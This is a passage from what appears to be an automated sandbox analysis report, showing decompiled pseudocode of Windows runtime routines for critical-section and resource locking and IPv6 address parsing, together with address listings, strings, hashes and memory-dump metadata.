												E00983915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0093F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00983915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00965329(_t74, _t92);
													_push(1);
													_t48 = E009653A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                              0x009653ab
                                                                                                                                                              0x009653ae
                                                                                                                                                              0x009653b1
                                                                                                                                                              0x009653b4
                                                                                                                                                              0x009653b7
                                                                                                                                                              0x009805b6
                                                                                                                                                              0x009805c0
                                                                                                                                                              0x009805c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009805c9
                                                                                                                                                              0x009805c9
                                                                                                                                                              0x009805cc
                                                                                                                                                              0x009805d5
                                                                                                                                                              0x009805d5
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x009a2349
                                                                                                                                                              0x009a234d
                                                                                                                                                              0x009a2273
                                                                                                                                                              0x009a2276
                                                                                                                                                              0x009a2279
                                                                                                                                                              0x009a227e
                                                                                                                                                              0x009a2283
                                                                                                                                                              0x009a2287
                                                                                                                                                              0x009a228a
                                                                                                                                                              0x009a228d
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22be
                                                                                                                                                              0x009a22c4
                                                                                                                                                              0x009a22cc
                                                                                                                                                              0x009a22d0
                                                                                                                                                              0x009a22d6
                                                                                                                                                              0x009a22d7
                                                                                                                                                              0x009a22da
                                                                                                                                                              0x009a22df
                                                                                                                                                              0x009a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22e6
                                                                                                                                                              0x009a22e9
                                                                                                                                                              0x009a22f4
                                                                                                                                                              0x009a22f9
                                                                                                                                                              0x009a22fa
                                                                                                                                                              0x009a2305
                                                                                                                                                              0x009a2314
                                                                                                                                                              0x009a2319
                                                                                                                                                              0x009a231a
                                                                                                                                                              0x009a231d
                                                                                                                                                              0x009a2320
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2328
                                                                                                                                                              0x009a232d
                                                                                                                                                              0x009a232f
                                                                                                                                                              0x009a2331
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a233b
                                                                                                                                                              0x009a233d
                                                                                                                                                              0x009a2350
                                                                                                                                                              0x009a2351
                                                                                                                                                              0x009a2356
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a235b
                                                                                                                                                              0x009a235d
                                                                                                                                                              0x00965367
                                                                                                                                                              0x0096536b
                                                                                                                                                              0x00965372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2369
                                                                                                                                                              0x009a236a
                                                                                                                                                              0x009a236c
                                                                                                                                                              0x009a2371
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a237a
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a2385
                                                                                                                                                              0x009a2386
                                                                                                                                                              0x009a2389
                                                                                                                                                              0x009a238e
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x00965378
                                                                                                                                                              0x0096537c
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2397
                                                                                                                                                              0x009a239c
                                                                                                                                                              0x009a23a2
                                                                                                                                                              0x009a23a3
                                                                                                                                                              0x009a23a6
                                                                                                                                                              0x009a23ab
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b4
                                                                                                                                                              0x009a23b9
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23bc
                                                                                                                                                              0x009a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999153
                                                                                                                                                              0x00999158
                                                                                                                                                              0x0099915a
                                                                                                                                                              0x0099915e
                                                                                                                                                              0x00999160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999171
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999160
                                                                                                                                                              0x009a23c6
                                                                                                                                                              0x009a23cb
                                                                                                                                                              0x009a23ce
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2293
                                                                                                                                                              0x009a2295
                                                                                                                                                              0x009a229a
                                                                                                                                                              0x009a22a1
                                                                                                                                                              0x009a22a3
                                                                                                                                                              0x009a22a7
                                                                                                                                                              0x009a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22ab
                                                                                                                                                              0x009a22ad
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x009a22b1
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x009653cb
                                                                                                                                                              0x009653ce
                                                                                                                                                              0x009653d0
                                                                                                                                                              0x009653d4
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d8
                                                                                                                                                              0x009653e3
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A22F4
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Resource at %p, xrefs: 009A230B
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009A22FC
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 009A2328
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                              • Opcode ID: dbb76d5c421f4c9d782efe9d07173ad43d00532effa8061311d3f236f258ac01
                                                                                                                                                              • Instruction ID: cb8e71f178527d762a04775780cb9503f2fa991afaf815ce1171e9ce1f17a6b7
                                                                                                                                                              • Opcode Fuzzy Hash: dbb76d5c421f4c9d782efe9d07173ad43d00532effa8061311d3f236f258ac01
                                                                                                                                                              • Instruction Fuzzy Hash: 2E51F771600702ABDF15EF28CC81FA6739CAF95B64F114229FD14DB381EA65ED418BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0096EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E0096EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0095DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xa2793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009416C0(_t39);
				} else {
					_t40 = E0093F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00983915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xa2793c; // 0x0
								_push(_t85);
								_t44 = E00941F28(_t71);
							} else {
								_t44 = E0093F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00983915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E009C2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0096EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00984FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00993F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00993F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xa220c0;
								if(_t85 != 0xa220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E009C217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00993F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec5c
                                                                                                                                                              0x0096ec64
                                                                                                                                                              0x009a23e6
                                                                                                                                                              0x009a23eb
                                                                                                                                                              0x009a23eb
                                                                                                                                                              0x0096ec6a
                                                                                                                                                              0x0096ec6c
                                                                                                                                                              0x0096ec6f
                                                                                                                                                              0x009a23f3
                                                                                                                                                              0x009a23f8
                                                                                                                                                              0x009a23fa
                                                                                                                                                              0x009a23fc
                                                                                                                                                              0x0096ec75
                                                                                                                                                              0x0096ec76
                                                                                                                                                              0x0096ec76
                                                                                                                                                              0x0096ec7b
                                                                                                                                                              0x0096ec7c
                                                                                                                                                              0x0096ec7e
                                                                                                                                                              0x009a2406
                                                                                                                                                              0x009a2407
                                                                                                                                                              0x009a240c
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a2414
                                                                                                                                                              0x009a2417
                                                                                                                                                              0x009a241e
                                                                                                                                                              0x009a2435
                                                                                                                                                              0x009a2438
                                                                                                                                                              0x009a243c
                                                                                                                                                              0x009a243f
                                                                                                                                                              0x009a2442
                                                                                                                                                              0x009a2443
                                                                                                                                                              0x009a2446
                                                                                                                                                              0x009a2449
                                                                                                                                                              0x009a2453
                                                                                                                                                              0x009a2455
                                                                                                                                                              0x009a245b
                                                                                                                                                              0x009a245b
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096eb9c
                                                                                                                                                              0x0096eb9d
                                                                                                                                                              0x0096eb9f
                                                                                                                                                              0x0096eba2
                                                                                                                                                              0x009a2465
                                                                                                                                                              0x009a246b
                                                                                                                                                              0x009a246d
                                                                                                                                                              0x0096eba8
                                                                                                                                                              0x0096eba9
                                                                                                                                                              0x0096eba9
                                                                                                                                                              0x0096ebae
                                                                                                                                                              0x0096ebb3
                                                                                                                                                              0x0096ebb9
                                                                                                                                                              0x0096ebbb
                                                                                                                                                              0x009a2513
                                                                                                                                                              0x009a2514
                                                                                                                                                              0x009a2519
                                                                                                                                                              0x009a251b
                                                                                                                                                              0x0096ec2a
                                                                                                                                                              0x0096ec2d
                                                                                                                                                              0x0096ec33
                                                                                                                                                              0x0096ec36
                                                                                                                                                              0x0096ec3a
                                                                                                                                                              0x0096ec3e
                                                                                                                                                              0x0096ec40
                                                                                                                                                              0x0096ec47
                                                                                                                                                              0x0096ec47
                                                                                                                                                              0x0096ec40
                                                                                                                                                              0x009422c6
                                                                                                                                                              0x0096ebc1
                                                                                                                                                              0x0096ebc1
                                                                                                                                                              0x0096ebc5
                                                                                                                                                              0x0096ec9a
                                                                                                                                                              0x0096ec9a
                                                                                                                                                              0x0096ebd6
                                                                                                                                                              0x0096ebd6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096ebbb
                                                                                                                                                              0x009a2477
                                                                                                                                                              0x009a247c
                                                                                                                                                              0x009a2486
                                                                                                                                                              0x009a248b
                                                                                                                                                              0x009a2496
                                                                                                                                                              0x009a249b
                                                                                                                                                              0x009a249d
                                                                                                                                                              0x009a24a0
                                                                                                                                                              0x009a24a3
                                                                                                                                                              0x009a24aa
                                                                                                                                                              0x009a24aa
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24ac
                                                                                                                                                              0x009a24af
                                                                                                                                                              0x009a24b0
                                                                                                                                                              0x009a24b3
                                                                                                                                                              0x009a24b9
                                                                                                                                                              0x009a24ba
                                                                                                                                                              0x009a24bb
                                                                                                                                                              0x009a24c6
                                                                                                                                                              0x009a24cb
                                                                                                                                                              0x009a24cd
                                                                                                                                                              0x009a24d0
                                                                                                                                                              0x009a24d1
                                                                                                                                                              0x009a24d4
                                                                                                                                                              0x009a24d6
                                                                                                                                                              0x009a24d9
                                                                                                                                                              0x009a24d9
                                                                                                                                                              0x009a24dc
                                                                                                                                                              0x009a24df
                                                                                                                                                              0x009a24e1
                                                                                                                                                              0x009a24e7
                                                                                                                                                              0x009a24e9
                                                                                                                                                              0x009a24ec
                                                                                                                                                              0x009a24ef
                                                                                                                                                              0x009a24f2
                                                                                                                                                              0x009a24f2
                                                                                                                                                              0x009a24ef
                                                                                                                                                              0x009a24e7
                                                                                                                                                              0x009a24fa
                                                                                                                                                              0x009a24ff
                                                                                                                                                              0x009a2501
                                                                                                                                                              0x009a2503
                                                                                                                                                              0x009a2506
                                                                                                                                                              0x009a250b
                                                                                                                                                              0x0096eb8c
                                                                                                                                                              0x0096eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096ec85
                                                                                                                                                              0x0096ec85
                                                                                                                                                              0x0096ec85
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009A24BD
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 009A24FA
                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009A248D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                              • Opcode ID: 716664a2de8f379c7a40c8a30663667c855851cc38bcfceeb370f84418d988e8
                                                                                                                                                              • Instruction ID: 0f7112c48f5a63cc697ce5fcb88013c837702b91196fcdbc8bc7da9f27ec3c52
                                                                                                                                                              • Opcode Fuzzy Hash: 716664a2de8f379c7a40c8a30663667c855851cc38bcfceeb370f84418d988e8
                                                                                                                                                              • Instruction Fuzzy Hash: 7341F370A04204AFDB24EF6CCC85F6E77E8EF89720F208A15F5559B2D1D739E9418BA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0097FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0097FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0097EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0097EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0097685D(_t167, 4) == 0) {
								if(E0097685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0097685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0097685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00958980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0094DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0097EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0097EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                              0x0097fcd1
                                                                                                                                                              0x0097fcd6
                                                                                                                                                              0x0097fcd9
                                                                                                                                                              0x0097fcdc
                                                                                                                                                              0x0097fcdf
                                                                                                                                                              0x0097fce2
                                                                                                                                                              0x0097fce5
                                                                                                                                                              0x0097fce8
                                                                                                                                                              0x0097fceb
                                                                                                                                                              0x0097fced
                                                                                                                                                              0x0097fced
                                                                                                                                                              0x0097fcf3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fcfc
                                                                                                                                                              0x0097fcfe
                                                                                                                                                              0x0097fdc1
                                                                                                                                                              0x009aecbd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeccc
                                                                                                                                                              0x009aeccc
                                                                                                                                                              0x009aecd2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecdf
                                                                                                                                                              0x009aece0
                                                                                                                                                              0x009aece4
                                                                                                                                                              0x009aeceb
                                                                                                                                                              0x009aecee
                                                                                                                                                              0x009aeca8
                                                                                                                                                              0x009aeca8
                                                                                                                                                              0x009aecaa
                                                                                                                                                              0x0097fd76
                                                                                                                                                              0x0097fd79
                                                                                                                                                              0x0097fdb4
                                                                                                                                                              0x0097fdb5
                                                                                                                                                              0x0097fdb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb6
                                                                                                                                                              0x0097fd7e
                                                                                                                                                              0x009aecfc
                                                                                                                                                              0x0097fe2f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fe2f
                                                                                                                                                              0x009aed08
                                                                                                                                                              0x009aed0f
                                                                                                                                                              0x009aed17
                                                                                                                                                              0x009aed1b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed1b
                                                                                                                                                              0x0097fd88
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd94
                                                                                                                                                              0x0097fd99
                                                                                                                                                              0x0097fda1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdb0
                                                                                                                                                              0x009aecbd
                                                                                                                                                              0x0097fdc7
